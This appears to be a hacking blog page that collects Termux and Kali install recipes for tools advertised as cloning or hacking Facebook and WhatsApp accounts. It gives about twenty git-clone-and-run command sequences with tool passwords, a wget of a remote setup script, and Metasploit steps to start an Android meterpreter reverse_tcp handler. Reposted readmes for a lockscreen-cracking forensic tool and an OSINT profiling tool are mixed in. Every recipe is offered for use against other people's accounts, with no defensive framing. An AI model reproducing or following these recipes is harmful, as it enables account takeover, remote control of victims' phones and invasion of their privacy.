Wednesday, October 20, 2021

Hack World tools

 


AbOut tHis ToOl

This Tool is Specially made for Facebook Accounts cloning.
you can clone your friend list accounts , targets accounts..
if you don,t know how to use this tool so you can visit our https://khansabaz.blogspot.com/ & read complete tutorial

you can also clone those accounts who's isnt add in your frndlist.
By using this tool you can hack unlimited accounts of diffrent countries
like

  • PAKISTAN
  • india
  • USA
  • Germany
  • France
  • Bangladash
  • Dubai
  • indonasia
  • Spain
  • Poland

Etc much more...

Installation On Termux

pkg install wget -y
wget https://github.com/evildevill/Homo-Attack/raw/master/setup.sh

Metasploit Commands

》》Requirements:-

1: Termux App (From Playstore)
2: Good Internet connection  (Must)
3: 2GB free Storage  (Must)
4: Android Version 5.0+ (Must)
5: 4GB+ RAM
6: Fast Processor

installation

1: pkg update
2: pkg upgrade
3: pkg install unstable-repo
4: pkg install metasploit
5: msfconsole
6: use exploit/multi/handler
7: set payload android/meterpreter/reverse_tcp 
8: set lhost 
8: set lport 8080
10: exploit
 MR WHO AM I


Tuesday, October 19, 2021

Black Mafia Hacking




 

All Commands BlackMafia

No 1 apt update apt upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/World cd World python2 Cloning.py

User: Black pass: Mafia

No 2 apt update apt upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/WorldCloning/ cd WorldCloning python2 World.py

User Name : World Password : lovehacker No 3 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize

git clone https://github.com/lovehacker404/Cobra

cd Cobra python2 Scorpion.py

User Name : Cobra Password: lovehacker No4 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/lov3Hak3r/ cd lov3Hak3r python2 lovehacker.py No 5 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/BlackMafia2020/ cd BlackMafia2020 python2 lovehacker

User Name:Corona Password :lovehacker No 6

pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize

git clone https://github.com/lovehacker404/CoviD-19/

cd CoviD-19 python2 Virus.py

User Name: Corona pasword: lovehacker No 7 pkg update pkg upgrade pkg install python2 pkg install git pip2 install mechanize pip2 install requests

git clone https://github.com/lovehacker404/Dragon/

cd Dragon python2 lovehacker.py

UserName: Dragon Password: lovehacker No8 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/KaliIndia/ cd KaliIndia python2 kalilinux.India.py User Name: India Password:lovehacker No9 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/Testing cd Testing python2 Project.py User Name: Testing pasword: lovehacker No10 git clone https://github.com/lovehacker404/Target.Atack/ cd Target.Atack ls cat README.md chmod +x Target.py ls nano password.txt ls pwd storage file location password.txt python2 Target.py No11 apt update apt upgrade pkg install python pkg install python2 pip2 install requests pip2 install mechanize pkg install git git clone https://github.com/lovehacker404/fblite cd fblite python2 Crack.py No12 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/india/ cd india python2 india.py

User name. KashmirBanyGa pasword.Pakistan No 13 pkg install python2 pip2 install mechanize pip2 install requests pkg install git git clone https://github.com/lovehacker404/BlackMafiaNew1.12/ ls cd BlackMafiaNew1.12 python2 lovehacker user name. lovehacker password . 03094161457 No 14 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/RedMoonNew/ cd RedMoonNew python2 lovehacker

User Name:: RedMoonNew Password:: lovehacker No15 apt update apt upgrade apt install git apt install python git clone https://github.com/lovehacker404/Install/ cd Install ls chmod +x * ls python all.py No16 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/NetHunting cd NetHunting python2 NetHunting.py

User Name : linux Password : lovehacker

No17

pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/WorldCloning/ cd WorldCloning python2 World.py

User Name : World Password : lovehacker No18 pkg update pkg upgrade pkg install python pkg install python2 pkg install git pip2 install requests pip2 install mechanize git clone https://github.com/lovehacker404/BangBang/ cd BangBang python2 Mafia User Name: Pakistan pasword: lovehacker

No19

pkg update pkg upgrade pkg install python2 pip2 install mechanize pkg install git pip2 install mechanize pip2 install requests git clone https://github.com/lovehacker404/BlackMafiaError cd BlackMafiaError python2 Error.py

No20 apt update apt upgrade -y pkg install python -y git clone https://github.com/lovehacker404/Black_Mafia cd Black_Mafia python3 Black_Mafia.py

#Metasploit Commands 》》Requirements:-

1: Termux App (From Playstore) 2: Good Internet connection (Must) 3: 2GB free Storage (Must) 4: Android Version 5.0+ (Must) 5: 4GB+ RAM 6: Fast Processor

#installation

1: pkg update 2: pkg upgrade 3: pkg install unstable-repo 4: pkg install metasploit 5: msfconsole 6: use exploit/multi/handler 7: set payload android/meterpreter/reverse_tcp 8: set lhost 8: set lport 8080 10: exploit




Saturday, October 16, 2021

Andriller For Recover Forgotten Password

 

git clone https://github.com/den4uk/andriller.git










Andriller CE (Community Edition)

Andriller - is software utility with a collection of forensic tools for smartphones. It performs read-only, forensically sound, non-destructive acquisition from Android devices. It has features, such as powerful Lockscreen cracking for Pattern, PIN code, or Password; custom decoders for Apps data from Android (some Apple iOS & Windows) databases for decoding communications. Extraction and decoders produce reports in HTML and Excel formats.

Features

  • Automated data extraction and decoding
  • Data extraction of non-rooted without devices by Android Backup (Android versions 4.x, varied/limited support)
  • Data extraction with root permissions: root ADB daemon, CWM recovery mode, or SU binary (Superuser/SuperSU)
  • Data parsing and decoding for Folder structure, Tarball files (from nanddroid backups), and Android Backup (backup.ab files)
  • Selection of individual database decoders for Android apps
  • Decryption of encrypted WhatsApp archived databases (.crypt to .crypt12, must have the right key file)
  • Lockscreen cracking for Pattern, PIN, Password (not gatekeeper)
  • Unpacking the Android backup files
  • Screen capture of a device's display screen

Python Requirements

  • 3.6+ (64-bit version recommended)

It is highly advised to setup a virtual environment to install Andriller and its dependencies in it. However, it is not essential, and the global environment can also be used. Depending on how Python was setup, it may be needed to substitute python and pip to python3 and pip3 retrospectively for the instructions below.

Windows only: when installing Python from https://www.python.org, make sure Add Python to PATH is ticked.

System Dependencies

  • adb
  • python3-tk

[Ubuntu/Debian] Install from Terminal:

$ sudo apt-get install android-tools-adb python3-tk

[Mac] Install from brew cask:

$ brew cask install android-platform-tools

[Windows] : Included.

Installation (Recommended way)

Create a virtual environment using Python 3:

$ python3 -m venv env

Activate the virtual environment (Linux/Mac):

$ source env/bin/activate

Activate the virtual environment (Windows):

> .\env\Scripts\activate

Install Andriller with its Python dependencies (same command to upgrade it):

(env) $ pip install andriller -U

Quick Start (run GUI)

(env) $ python -m andriller

License

MIT License

Contributing

Contributions are welcome, please make your pull requests to the dev branch of the repository.

Bug Tracker

Bugs and issues can be submitted in the (Issues) section.

Donations

 <MR WHO AM I>

Scylla For Searches on Instagram & Twitter and Find Phone Numbers

 



Notice For Deprecation

This project is no longer being worked on by the developer. As of today, the program has many flaws and is not up to modern OSINT standards. A lot of APIs utilized within Scylla are no longer working as they did when the project was first released. The developer wrote Scylla out of boredom and as a side project therefore he is no longer working on it. The community is more than welcome to use Scylla's source as a base to improve on it's original capabilities to keep the tool alive. Please do not contact the developer to fix issues as he will not be replying as the project is deprecated.

About Scylla

Scylla is an OSINT tool developed in Python 3.6. Scylla lets users perform advanced searches on Instagram & Twitter accounts, websites/webservers, phone numbers, and names. Scylla also allows users to find all social media profiles (main platforms) assigned to a certain username. In continuation, Scylla has shodan support so you can search for devices all over the internet, it also has in-depth geolocation capabilities. Lastly, Scylla has a finance section which allows users to check if a credit/debit card number has been leaked/pasted in a breach and returns information on the cards IIN/BIN. This is the first version of the tool so please contact the developer if you want to help contribute and add more to Scylla.

Installation

1: git clone https://www.github.com/DoubleThreatSecurity/Scylla
2: cd Scylla
3: sudo python3 -m pip install -r requirments.txt
4: python3 scylla.py --help

Usage

  1. python3 scylla.py --instagram davesmith --twitter davesmith
    Command 1 will return account information of that specified Instagram & Twitter account.
  2. python3 scylla.py --username johndoe
    Command 2 will return all the social media (main platforms) profiles associated with that username.
  3. python3 scylla.py --username johndoe -l="john doe"
    Command 3 will repeat command 2 but instead it will also perform an in-depth google search for the "-l" argument. NOTE: When searching a query with spaces make sure you add the equal sign followed by the query in quotations. If your query does not have spaces, it will be as such: python3 scylla.py --username johndoe -l query
  4. python3 scylla.py --info google.com
    Command 4 will return crucial WHOIS information about the webserver/website.
  5. python3 scylla.py -r +14167777777
    Command 5 will dump information on that phone number (Carrier, Location, etc.)
  6. python3 scylla.py -s apache
    Command 6 will dump all the IP address of apache servers that shodan can grab based on your API key. The query can be anything that shodan can validate.
    A Sample API key is given. I will recommend reading API NOTICE below, for more information.
  7. python3 scylla.py -s webcamxp
    Command 7 will dump all the IP addresses and ports of open webcams on the internet that shodan can grab based on your API key. You can also just use the webcam query but webcamxp returns better results.
    A Sample API key is given. I will recommend reading API NOTICE below, for more information.
  8. python3 scylla.py -g 1.1.1.1
    Command 8 will geolocate the specified IP address. It will return the longitude & latitude, city, state/province, country, zip/postal code region and the district.
  9. python3 scylla.py -c 123456789123456
    Command 9 will retrieve information on the IIN of the credit/debit card number entered. It will also check if the card number has been leaked/pasted in a breach. Scylla will return the card brand, card scheme, card type, currency, country, and information on the bank of that IIN. NOTE: Enter the full card number if you will like to see if it was leaked. If you just want to check data on the first 6-8 digits (a.k.a the BIN/IIN number) just input the first 6,7 or 8 digits of the credit/debit card number. Lastly, all this information generated is public because this is an OSINT tool, and no revealing details can be generated. This prevents malicous use of this option.

Menu

usage: scylla.py [-h] [-v] [-ig INSTAGRAM] [-tw TWITTER] [-u USERNAME]
                 [--info INFO] [-r REVERSE_PHONE_LOOKUP] [-l LOOKUP]
                 [-s SHODAN_QUERY] [-g GEO] [-c CARD_INFO]

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         returns scyla's version
  -ig INSTAGRAM, --instagram INSTAGRAM
                        return the information associated with specified
                        instagram account
  -tw TWITTER, --twitter TWITTER
                        return the information associated with specified
                        twitter account
  -u USERNAME, --username USERNAME
                        find social media profiles (main platforms) associated
                        with given username
  --info INFO           return information about the specified website(WHOIS)
                        w/ geolocation
  -r REVERSE_PHONE_LOOKUP, --reverse_phone_lookup REVERSE_PHONE_LOOKUP
                        return information about the specified phone number
                        (reverse lookup)
  -l LOOKUP, --lookup LOOKUP
                        performs a google search of the 35 top items for the
                        argument given
  -s SHODAN_QUERY, --shodan_query SHODAN_QUERY
                        performs a an in-depth shodan search on any simple
                        query (i.e, 'webcamxp', 'voip', 'printer', 'apache')
  -g GEO, --geo GEO     geolocates a given IP address. provides: longitude,
                        latitude, city, country, zipcode, district, etc.
  -c CARD_INFO, --card_info CARD_INFO
                        check if the credit/debit card number has been pasted
                        in a breach...dumps sites. Also returns bank
                        information on the IIN
 MR Who Am I

Friday, October 8, 2021

whatsapp tools {Termux}

 










X-Whatsapp

Hack WhatsApp Account Easily(Android)

HOW TO RUN👇 (Termux)

pkg update && pkg upgrade

pkg install python

pkg install git

git clone https://github.com/KiLL3R-xRO/X-Whatsapp

cd X-Whatsapp

python main.py


 MR who am i


whasapp hacking {kali}

 

Usage of WhatsHack for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Installing on Kali Linux:

Install dependencies:
# apt-get update
# apt-get install openjdk-8-jdk
# apt-get install gradle

Use Java8:
Get Java8 dir with command:
# update-alternatives --list java

Copy and replace dir on command:
# update-alternatives --set java /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java

Download Android Studio:
https://developer.android.com/studio

Installing Android Studio:
# unzip ~/Downloads/android*.zip -d /opt

For AMD64 Arch, Install Android Studio dependencies:
# apt-get install lib32z1 lib32ncurses6 lib32stdc++6


Run Android Studio:
# cd /opt/android-studio/bin
# ./studio.sh

Go to SDK Manager (Configure -> SDK Manager) and Download:
Android SDK Build-tools, Android SDK-tools, Android SDK platform-tools, Support Repository

Run script:
# git clone https://github.com/ZheHack/whatshack
# cd whatshack/
# bash whatshack.sh


On First Time, Choose "n" when asks to build, then open the project on Android Studio:
cd /opt/android-studio/bin
./studio.sh

Import Gradle Project:
Choose whatshack app folder: whatshack/app/

Wait all dependencies downloading, if you got errors, click on showed links to solve.
Try build from Android Studio: Build > build APK's
Click on showed links if you got errors.
Close Android after building successfully.

open with any Text Editor the file app/build.gradle

remove "google()"
change gradle version from: 3.4.1 to: 2.2.0
save and exit.

Run script (as root):
# bash whatshack.sh


SMF PHISHING Tools